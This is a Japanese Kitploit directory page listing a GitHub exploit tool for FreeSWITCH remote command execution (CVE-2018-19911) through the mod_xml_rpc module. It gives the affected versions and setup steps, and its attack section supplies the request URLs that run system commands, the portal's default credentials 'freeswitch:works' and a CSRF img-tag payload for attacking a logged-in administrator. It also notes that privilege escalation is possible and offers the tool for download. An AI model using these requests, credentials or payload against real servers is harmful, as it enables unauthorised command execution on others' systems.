Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
freeswitch_rce — freeswitch 全バージョン リモートコマンド実行 (CVE-2018-19911) | Kitploit
ツール/GitHubGitHub/isafeblue/freeswitch_rce
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubisafeblue/freeswitch_rce

freeswitch_rce

freeswitch 全バージョン リモートコマンド実行 (CVE-2018-19911)

リポジトリを見る
527年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

version:<=1.8.2

module:mod_xml_rpc

合計3つのバージョンをテストしました。(download url:http://files.freeswitch.org/)

  • 1.8.2
  • 1.5.15
  • 1.7.0

1.5.15

freeswitch1.5.15 Windows版をインストール(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)

コンソールを開き、次のように入力します: load mod_xml_rpc (freeswitchポータルをロード)

ローカルポート8080にアクセスし、

http://127.0.0.1:8080/portal/index.html

コンソールに入力 api("system calc")またはapi("bg_system calc")

1

インターフェースに直接リクエストすることもできます

http://127.0.0.1:8080/txtapi/system?calc または

http://127.0.0.1:8080/api/system?calc

1

1.7.0

1

1

エクスプロイト

freeswitchポータルのデフォルトのアカウントとパスワードは freeswitch:works です。

自分で freeswitch_rce.py を使って確認できます。

または、CSRFを使用してログイン中の管理者を攻撃します。

root@kitploit:~
<img src="http://127.0.0.1:8080/api/system?calc">

1

freeswitchは多くの場合高い権限で実行されるため、特権昇格の効果も達成できます。

ツールをダウンロード